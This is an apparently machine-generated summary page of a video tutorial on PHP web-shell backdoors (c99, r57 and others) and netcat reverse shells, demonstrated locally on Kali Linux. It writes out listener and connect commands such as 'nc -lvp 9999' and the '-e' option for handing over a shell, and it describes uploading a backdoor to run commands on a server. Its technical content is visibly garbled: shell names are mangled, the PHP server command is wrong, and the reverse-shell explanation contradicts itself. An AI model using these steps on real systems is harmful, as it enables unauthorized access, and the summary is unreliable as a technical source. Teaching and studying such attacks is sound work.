12 Backdoor & Reverse Shell

Coding Studio

28 Sept 202108:29

Summary

TLDRThis video script delves into the concepts of backdoors and reverse shells in cybersecurity. It explains how backdoors are unauthorized access tools that bypass authentication, with examples of PHP backdoors like c99, becak, r57, and punycode. The script also covers reverse shells, which are used to listen for incoming connections, allowing an attacker to gain access to a host. Practical demonstrations using Kali Linux are provided, including setting up a local PHP server and executing commands through a reverse shell, showcasing the real-world application of these cybersecurity techniques.

Takeaways

🔒 The script discusses 'backdoor' as a software device created to access a system without authentication.
📂 It explains how an attacker uploads a backdoor file and uses it to access a server without the server's mechanism.
🌐 The variety of backdoors available online is vast and depends on the programming language, with examples given in PHP like c99, becak, r57, and paunisel.
💻 The script covers 'reversal', which is an activity where an attacker listens for incoming connections, aiming to gain access to a shell.
📝 It describes the process of simulating and running a backdoor called 'fauni shell' using Kali Linux.
📁 The importance of setting up a shell environment or downloading a shell from a specific website is highlighted.
🖥️ Demonstrates how to run a local PHP server using a command to facilitate the execution of the backdoor.
🛠️ The script includes running various commands within the shell, showcasing the capabilities of the backdoor.
🔄 The concept of 'reversal shell' is introduced, where the attacker sets up a listening connection to gain a shell from the host.
🔑 It explains the use of the 'nc' command with parameters for creating a listening connection and establishing a reverse shell.
📍 The script concludes with an interactive demonstration of connecting to a host using a reverse shell and verifying the connection by issuing commands like 'PWD'.

Q & A

What is a backdoor in the context of the script?
-A backdoor is a software tool created to access a system without the need for authentication. It allows an attacker to upload a file and later access the server using that backdoor without the server's mechanism.
What is the purpose of a backdoor in cybersecurity?
-The purpose of a backdoor in cybersecurity is to provide unauthorized access to a system, often for malicious activities such as data theft or system control.
Can you name some examples of backdoors in PHP programming mentioned in the script?
-The script mentions c99, becak, r57, and paunisel as examples of backdoors in PHP programming.
What is the difference between a backdoor and a regular system access method?
-A backdoor bypasses the standard authentication process, whereas regular system access methods require credentials such as a username and password.
What is a reversal in the context of the script?
-A reversal, in the script's context, refers to an activity where an attacker sets up a connection to a host that is in a listening state, allowing the attacker to gain access to the host's shell.
What is the significance of the term 'listening' in the context of reversals?
-In the context of reversals, 'listening' refers to the state where a host is waiting for incoming connections, which an attacker can exploit to establish a shell connection.
What is the purpose of simulating and running a backdoor like 'fauni sel' in the script?
-Simulating and running a backdoor like 'fauni sel' is to demonstrate how an attacker can gain unauthorized access to a system, which is crucial for understanding and defending against such attacks.
How does one create a local PHP server as mentioned in the script?
-A local PHP server can be created using the command 'php-win.exe localhost 8108', which sets up a server on the localhost with port 8108.
What is the role of the 'nc' command in the script's context?
-The 'nc' (netcat) command is used for setting up a listening port on the attacker's machine and for establishing a connection to the host's shell.
What does the '-e' option in the 'nc' command do in the script?
-The '-e' option in the 'nc' command is used to specify the executable to run after a connection is made, in this case, to run a shell from the connected host.
How does the script demonstrate the connection between the attacker and the host?
-The script demonstrates the connection by using two terminals, one representing the attacker and the other the host, and shows the process of establishing a shell connection using the 'nc' command.

Outlines

00:00

🔒 Introduction to Backdoors and Reversal Techniques

This paragraph introduces the concept of backdoors, which are unauthorized access tools that bypass authentication mechanisms. It explains how an attacker can upload a backdoor file and later access a system without the server's authentication process. The paragraph also touches on various types of backdoors available online, such as PHP-based shells like c99, becak, r57, and Paunch. It discusses the idea of 'reversal,' which is an activity where an attacker listens for incoming connections to gain access to a host. The speaker mentions setting up and running a backdoor called 'fauni' using Kali Linux and also performing a reversal. The paragraph concludes with instructions on how to simulate and execute the backdoor locally by creating a PHP server and accessing it through a browser.

05:00

🔄 Simulating Network Connections for Reversal

The second paragraph delves into the technical process of simulating network connections for the purpose of reversal. It describes changing directories to the desktop to differentiate between the attacker's and host's environments. The speaker explains how to use the 'nc' command with various parameters, such as '-lv' for listening mode, '-P' for port, and '-e' to execute a program after a connection is established. The paragraph illustrates how to set up a listening mode on a specific port and how to connect to it from the host's perspective using a local IP address and port number. The use of SSH (Secure Shell) is mentioned as an example of a command that could be executed after establishing a connection. The paragraph concludes with a demonstration of verifying the connection by checking the current directory, which confirms that the connection is made from the host's desktop directory.

Mindmap

Keywords

💡Backdoor

A backdoor refers to a secret or unauthorized access point to a computer system that bypasses normal authentication procedures. In the video's context, attackers use backdoors to gain unauthorized access to servers without the need for legitimate credentials. The script mentions the uploading of a backdoor file and the subsequent access to the server through this backdoor, illustrating the theme of unauthorized access and cybersecurity.

💡Authentication

Authentication is the process of verifying the identity of a user, device, or system as a prerequisite to allowing access to resources. The video discusses how backdoors allow bypassing this process, which is a critical aspect of maintaining system security. The script implies that a backdoor negates the need for authentication, thus compromising the security measures in place.

💡PHP

PHP is a server-side scripting language used for creating dynamic web pages. The script mentions PHP as the programming language for certain backdoors, such as 'c99', 'becak', 'r57', and 'Pau nisel', indicating the prevalence of backdoors in various programming languages and the importance of secure coding practices to prevent such vulnerabilities.

💡Backdoor Shell

A backdoor shell is a type of backdoor that provides a command-line interface to an attacker, allowing them to execute system commands remotely. The video's discussion of PHP backdoors and their ability to run system commands exemplifies the functionality of a backdoor shell in providing unauthorized control over a system.

💡Reversal

Reversal, in the context of the video, refers to the activity of setting up a listening connection by an attacker to intercept incoming connections. This is a technique used in cybersecurity to gain unauthorized access and control over a system. The script describes the process of an attacker setting up a listening connection to obtain a shell from the target host, demonstrating the concept of reversal in action.

💡Listening

In networking, listening refers to the state where a system or service is waiting for incoming connections. The video script describes an attacker setting up a listening connection, which is a crucial step in the reversal process to intercept and exploit incoming network traffic.

💡Kali Linux

Kali Linux is a Linux distribution designed for digital forensics and penetration testing. The script mentions using Kali Linux to simulate and run a backdoor, indicating its role as a platform for cybersecurity professionals to test and understand security vulnerabilities and exploit techniques.

💡PHP Server

A PHP server is a server configured to execute PHP scripts, allowing for the creation of dynamic web content. The video script describes setting up a local PHP server using 'php-win.exe localhost' to run a backdoor, illustrating the practical application of server setup in testing and understanding backdoor functionalities.

💡Terminal

A terminal is an interface that allows users to interact with the operating system through a command-line interface. The script refers to opening a terminal to execute commands and run a backdoor, highlighting the terminal's role in system administration and command execution.

💡NC (Netcat)

Netcat, often referred to as 'nc', is a utility used for reading from and writing to network connections using TCP or UDP. The video script discusses using 'nc' for creating a listening connection and establishing a reverse shell, demonstrating its use in network communication and exploitation techniques.

💡Port

A port is a numerical identifier in networking used to route messages to the correct application on a server. The script mentions setting up a listening connection on a specific port (9999) and connecting to it, which is essential for establishing a reverse shell and illustrates the importance of port management in cybersecurity.

Highlights

Introduction to backdoors and their purpose in accessing systems without authentication.

Backdoors are software tools used by attackers to upload files for unauthorized access.

Different types of backdoors exist, such as C99, Becak, R57, and Paunch, depending on the programming language.

Explanation of how backdoors can execute system commands once uploaded.

Reversal activity involves an attacker listening for incoming connections to gain access to a host.

Demonstration of setting up a local PHP server for testing backdoors.

Using the PHP command 'php-win.exe localhost' to create a server on port 8108.

Accessing the local PHP server through a web browser to view the backdoor interface.

Executing common commands through the backdoor to demonstrate its capabilities.

Simulating a scenario where an attacker uses a backdoor to gain access to a host.

Using two terminals to represent an attacker and a host for the simulation.

Running the 'nc' command to establish a reverse shell connection between the attacker and host.

Explanation of the 'nc' command parameters used for setting up the reverse shell.

Executing the reverse shell command 'nc -lvp 9999' to listen for incoming connections.

Connecting to the listening port using 'nc 127.0.0.1 9999' from the host side.

Using the '-e' parameter to execute a shell from the connected host.

Verification of successful access by checking the current directory with the 'PWD' command.

Conclusion of the session with a preview of the next video content.